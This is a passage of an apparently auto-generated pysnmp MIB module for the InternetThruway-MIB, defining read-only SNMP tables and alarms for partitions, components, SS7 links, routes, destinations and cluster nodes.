if mibBuilder.loadTexts: partitionTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: partitionTableEntry.setDescription('An entry in the PartitionTable. Indexed by partitionIndex')
class PartitionSpaceStatus(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("spaceAlarmOff", 1), ("spaceAlarmOn", 2))
partitionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 4)))
if mibBuilder.loadTexts: partitionIndex.setStatus('mandatory')
if mibBuilder.loadTexts: partitionIndex.setDescription('Identifies partition number.')
partitionName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionName.setStatus('mandatory')
if mibBuilder.loadTexts: partitionName.setDescription('Identifies partition name.')
partitionPercentFull = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100))).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionPercentFull.setStatus('mandatory')
if mibBuilder.loadTexts: partitionPercentFull.setDescription('Indicates (in Percent) how full the disk is.')
partitionMegsFree = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionMegsFree.setStatus('mandatory')
if mibBuilder.loadTexts: partitionMegsFree.setDescription('Indicates how many Megabytes are free on the partition.')
partitionSpaceStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 5), PartitionSpaceStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceStatus.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceStatus.setDescription('Indicates if there is currently a space alarm in progress.')
partitionSpaceKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceKey.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceKey.setDescription('Unique indicator for the partition space alarm.')
partitionSpaceTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 1, 1, 1, 1, 7), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: partitionSpaceTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: partitionSpaceTimeStamp.setDescription('Indicates the time of the last partitionSpaceStatus transition.')
componentTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10), )
if mibBuilder.loadTexts: componentTable.setStatus('mandatory')
if mibBuilder.loadTexts: componentTable.setDescription('The ComponentTable contains information about all the Components that should be running on the CSG.')
componentTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1), ).setIndexNames((0, "InternetThruway-MIB", "componentIndex"))
if mibBuilder.loadTexts: componentTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: componentTableEntry.setDescription('An entry in the ComponentTable. componentTable entries are indexed by componentIndex, which is an integer. ')
class ComponentIndex(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))
namedValues = NamedValues(("oolsproxy", 1), ("climan", 2), ("arm", 3), ("sem", 4), ("hgm", 5), ("survman", 6), ("ss7scm", 7), ("ss7opm", 8), ("ss7cheni", 9))
class ComponentSysmanState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("inProvisionedState", 1), ("notInProvisionedState", 2), ("unknown", 3))
componentIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 1), ComponentIndex())
if mibBuilder.loadTexts: componentIndex.setStatus('mandatory')
if mibBuilder.loadTexts: componentIndex.setDescription('Identifies the component entry with an enumerated list.')
componentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: componentName.setStatus('mandatory')
if mibBuilder.loadTexts: componentName.setDescription('Identifies component name.')
compSecsInCurrentState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compSecsInCurrentState.setStatus('mandatory')
if mibBuilder.loadTexts: compSecsInCurrentState.setDescription('Indicates how many seconds a component has been running in its current state. ')
compProvStateStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 4), ComponentSysmanState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateStatus.setDescription('Indicates the current state of the particular CSG component. The states are one of the following: inProvisionedState(1), notInProvisionedState(2), unknown(3)')
compProvStateKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateKey.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateKey.setDescription('Unique indicator for the prov state alarm.')
compProvStateTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 6), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compProvStateTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compProvStateTimeStamp.setDescription('Indicates the time of the last state transition.')
compDebugStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugStatus.setDescription('Shows if the component is running with debug on.')
compDebugKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugKey.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugKey.setDescription('Unique indicator for the debug state.')
compDebugTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 9), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compDebugTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compDebugTimeStamp.setDescription('Indicates the time of the last debug transition.')
compRestartStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartStatus.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartStatus.setDescription('Shows if the component has had multiple restarts recently.')
compRestartKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartKey.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartKey.setDescription('Unique indicator for the multi-restart of components.')
compRestartTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 2, 10, 1, 12), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: compRestartTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: compRestartTimeStamp.setDescription('Indicates the time of the last restart flagging.')
linksetTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1), )
if mibBuilder.loadTexts: linksetTable.setStatus('mandatory')
if mibBuilder.loadTexts: linksetTable.setDescription('The linksetTable contains information about all the linksets on the CSG.')
linksetTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"))
if mibBuilder.loadTexts: linksetTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linksetTableEntry.setDescription('An entry in the linksetTable. Entries in the linkset table are indexed by linksetIndex, which is an integer.')
class LinksetState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("available", 1), ("unAvailable", 2))
linksetIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: linksetIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linksetIndex.setDescription("Identifies the n'th position in the table.")
linksetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetId.setStatus('mandatory')
if mibBuilder.loadTexts: linksetId.setDescription('The id of the linkset to be used as index.')
linksetAdjPointcode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetAdjPointcode.setStatus('mandatory')
if mibBuilder.loadTexts: linksetAdjPointcode.setDescription('The adjacent pointcode of the linkset.')
linksetState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 1, 1, 4), LinksetState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linksetState.setStatus('mandatory')
if mibBuilder.loadTexts: linksetState.setDescription('The state of the linkset.')
linkTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2), )
if mibBuilder.loadTexts: linkTable.setStatus('mandatory')
if mibBuilder.loadTexts: linkTable.setDescription('The linkTable contains information about the links in a given linkset on the CSG.')
linkTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"), (0, "InternetThruway-MIB", "linkIndex"))
if mibBuilder.loadTexts: linkTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linkTableEntry.setDescription('An entry in the linkTable. Entries in the link table table are indexed by linksetIndex and linkIndex, which are both integers.')
class LinkState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("available", 1), ("unAvailable", 2))
class LinkInhibitionState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("unInhibited", 1), ("localInhibited", 2), ("remoteInhibited", 3), ("localRemoteInhibited", 4))
class LinkCongestionState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("notCongested", 1), ("congested", 2))
class LinkAlignmentState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2))
namedValues = NamedValues(("aligned", 1), ("notAligned", 2))
linkIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: linkIndex.setStatus('mandatory')
if mibBuilder.loadTexts: linkIndex.setDescription("Identifies the n'th position in the table.")
linkId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkId.setStatus('mandatory')
if mibBuilder.loadTexts: linkId.setDescription('The id of the link.')
linkHostname = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkHostname.setStatus('mandatory')
if mibBuilder.loadTexts: linkHostname.setDescription('The hostname of the CSG to which this link is attached.')
linkCardDeviceName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCardDeviceName.setStatus('mandatory')
if mibBuilder.loadTexts: linkCardDeviceName.setDescription('The device name of the card upon which this link is hosted.')
linkState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 5), LinkState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkState.setStatus('mandatory')
if mibBuilder.loadTexts: linkState.setDescription('The state of the link.')
linkInhibitionState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 6), LinkInhibitionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkInhibitionState.setStatus('mandatory')
if mibBuilder.loadTexts: linkInhibitionState.setDescription('The inhibition status of the link.')
linkCongestionState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 7), LinkCongestionState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCongestionState.setStatus('mandatory')
if mibBuilder.loadTexts: linkCongestionState.setDescription('The congestion status of the link.')
linkAlignmentState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 8), LinkAlignmentState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkAlignmentState.setStatus('mandatory')
if mibBuilder.loadTexts: linkAlignmentState.setDescription('The alignment status of the link.')
linkNumMSUReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUReceived.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUReceived.setDescription("This object supplies the number of MSU's received by the link.")
linkNumMSUDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUDiscarded.setDescription("This object supplies the number of received MSU's discarded by the link.")
linkNumMSUTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumMSUTransmitted.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumMSUTransmitted.setDescription("This object supplies the number of MSU's transmitted by the link.")
linkNumSIFReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumSIFReceived.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumSIFReceived.setDescription('This object supplies the number of SIF and SIO octets received by the link.')
linkNumSIFTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumSIFTransmitted.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumSIFTransmitted.setDescription('This object supplies the number of SIF and SIO octects transmitted by the link.')
linkNumAutoChangeovers = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumAutoChangeovers.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumAutoChangeovers.setDescription('This object supplies the number of automatic changeovers undergone by the link.')
linkNumUnexpectedMsgs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkNumUnexpectedMsgs.setStatus('mandatory')
if mibBuilder.loadTexts: linkNumUnexpectedMsgs.setDescription('This object supplies the number of unexpected messages received by the link.')
routeTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3), )
if mibBuilder.loadTexts: routeTable.setStatus('mandatory')
if mibBuilder.loadTexts: routeTable.setDescription('The routeTable contains information about the routes provisioned in the CSG complex.')
routeTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1), ).setIndexNames((0, "InternetThruway-MIB", "routeIndex"))
if mibBuilder.loadTexts: routeTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: routeTableEntry.setDescription('An entry in the routeTable. Entries in the route table are indexed by routeIndex, which is an integer.')
class RouteState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("accessible", 1), ("inaccessible", 2), ("restricted", 3))
routeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 1), Integer32())
if mibBuilder.loadTexts: routeIndex.setStatus('mandatory')
if mibBuilder.loadTexts: routeIndex.setDescription("Identifies the n'th position in the table.")
routeId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeId.setStatus('mandatory')
if mibBuilder.loadTexts: routeId.setDescription('The unique identifier of the route.')
routeDestPointCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeDestPointCode.setStatus('mandatory')
if mibBuilder.loadTexts: routeDestPointCode.setDescription('The destination point code associated with this route.')
routeState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 4), RouteState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeState.setStatus('mandatory')
if mibBuilder.loadTexts: routeState.setDescription('The current state of the route.')
routeRank = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeRank.setStatus('mandatory')
if mibBuilder.loadTexts: routeRank.setDescription('Rank assigned to this route.')
routeLinksetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 3, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: routeLinksetId.setStatus('mandatory')
if mibBuilder.loadTexts: routeLinksetId.setDescription('The linkset associated with this route.')
destinationTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4), )
if mibBuilder.loadTexts: destinationTable.setStatus('mandatory')
if mibBuilder.loadTexts: destinationTable.setDescription('The destinationTable contains information about the destinations provisioned in the CSG complex.')
destinationTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1), ).setIndexNames((0, "InternetThruway-MIB", "destIndex"))
if mibBuilder.loadTexts: destinationTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: destinationTableEntry.setDescription('An entry in the destinationTable. Entries in the destination table are indexed by destIndex, which is an integer.')
class DestinationState(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("accessible", 1), ("inaccessible", 2), ("restricted", 3))
destIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 1), Integer32())
if mibBuilder.loadTexts: destIndex.setStatus('mandatory')
if mibBuilder.loadTexts: destIndex.setDescription("Identifies the n'th position in the table.")
destPointCode = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destPointCode.setStatus('mandatory')
if mibBuilder.loadTexts: destPointCode.setDescription('The destination point code of this destination.')
destState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 3), DestinationState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destState.setStatus('mandatory')
if mibBuilder.loadTexts: destState.setDescription('The current state of the destination.')
destRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 6, 4, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: destRuleId.setStatus('mandatory')
if mibBuilder.loadTexts: destRuleId.setDescription('Rule Identifier (for the routing table to be used) for this destination.')
ncServerId = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncServerId.setStatus('mandatory')
if mibBuilder.loadTexts: ncServerId.setDescription(' The ServerId attribute value of the node.')
ncServerName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncServerName.setStatus('mandatory')
if mibBuilder.loadTexts: ncServerName.setDescription(' The ServerName attribute value of the node.')
ncHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncHostName.setStatus('mandatory')
if mibBuilder.loadTexts: ncHostName.setDescription(' The HostName attribute value of the node.')
ncEthernetName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncEthernetName.setStatus('mandatory')
if mibBuilder.loadTexts: ncEthernetName.setDescription(' The EthernetName attribute value of the node.')
ncEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: ncEthernetIP.setDescription(' The EthernetIP attribute value of the node.')
ncClusterName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncClusterName.setStatus('mandatory')
if mibBuilder.loadTexts: ncClusterName.setDescription(' The ClusterName attribute value of the node.')
ncClusterIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncClusterIP.setStatus('mandatory')
if mibBuilder.loadTexts: ncClusterIP.setDescription(' The ClusterIP attribute value of the node.')
ncOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: ncOperationalState.setDescription(' The OperationalState of the node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
ncStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: ncStandbyState.setDescription(' The StandbyState attribute value of the node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
ncAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: ncAvailabilityState.setDescription(' The AvailabilityState attribute value of the node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
ncSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 12), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncSoftwareVersion.setStatus('mandatory')
if mibBuilder.loadTexts: ncSoftwareVersion.setDescription(' The SoftwareVersion attribute value of the node.')
class UpgradeInProgress(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2)
ncUpgradeInProgress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 13), UpgradeInProgress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ncUpgradeInProgress.setStatus('mandatory')
if mibBuilder.loadTexts: ncUpgradeInProgress.setDescription(' The UpgradeInProgress attribute value of the node. Possible values are: 0 = UNKNOWN, 1 = ACTIVE, 2 = INACTIVE ')
hgAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10), )
if mibBuilder.loadTexts: hgAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTable.setDescription('The HgAlarmTable contains information about all the current HG alarms')
hgAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1), ).setIndexNames((0, "InternetThruway-MIB", "hgIndex"))
if mibBuilder.loadTexts: hgAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTableEntry.setDescription('An entry in the HgAlarmTable. HgAlarmTable entries are indexed by componentIndex, which is an integer.')
hgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 1), Integer32())
if mibBuilder.loadTexts: hgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: hgIndex.setDescription("Identifies the n'th position in the table.")
hgName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgName.setStatus('mandatory')
if mibBuilder.loadTexts: hgName.setDescription('The Home gateway to be used as index')
hgKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgKey.setStatus('mandatory')
if mibBuilder.loadTexts: hgKey.setDescription('Unique identifier for the HgFailure alarm ')
hgAlarmTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgAlarmTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: hgAlarmTimeStamp.setDescription('Indicates the time of the HG Alarm.')
hgIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 10, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hgIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: hgIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
nasAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11), )
if mibBuilder.loadTexts: nasAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTable.setDescription('The NasAlarmTable contains information about all the current NAS alarms')
nasAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1), ).setIndexNames((0, "InternetThruway-MIB", "nasIndex"))
if mibBuilder.loadTexts: nasAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTableEntry.setDescription('An entry in the NasAlarmTable. NasAlarmTable entries are indexed by nasIndex, which is an integer.')
nasIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 1), Integer32())
if mibBuilder.loadTexts: nasIndex.setStatus('mandatory')
if mibBuilder.loadTexts: nasIndex.setDescription("Identifies the n'th position in the table.")
nasName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasName.setStatus('mandatory')
if mibBuilder.loadTexts: nasName.setDescription('The NAS Name')
nasKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasKey.setStatus('mandatory')
if mibBuilder.loadTexts: nasKey.setDescription('Unique identifier for the NAS Failure alarm ')
nasAlarmTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 4), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAlarmTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: nasAlarmTimeStamp.setDescription('Indicates the time of the NAS Alarm.')
nasIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 5), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: nasIPAddress.setDescription('This object identifies the IP Address of the machine which sent the alarm.')
nasCmplxName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 11, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCmplxName.setStatus('mandatory')
if mibBuilder.loadTexts: nasCmplxName.setDescription(' The complex which this alarm is raised against.')
ss7LinkFailureAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12), )
if mibBuilder.loadTexts: ss7LinkFailureAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkFailureAlarmTable.setDescription('The SS7LinkFailureAlarmTable contains alarms for SS7 link failures.')
ss7LinkFailureAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1), ).setIndexNames((0, "InternetThruway-MIB", "lfIndex"))
if mibBuilder.loadTexts: ss7LinkFailureAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: ss7LinkFailureAlarmTableEntry.setDescription('This object defines a row within the SS7 Link Failure Alarm Table. A row can be uniquely identified with the row index.')
lfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 1), Integer32())
if mibBuilder.loadTexts: lfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lfIndex.setDescription('Identifies the row number in the table.')
lfKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfKey.setStatus('mandatory')
if mibBuilder.loadTexts: lfKey.setDescription('Unique identifier for the alarm.')
lfIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 12, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lfIPAddress.setStatus('mandatory')
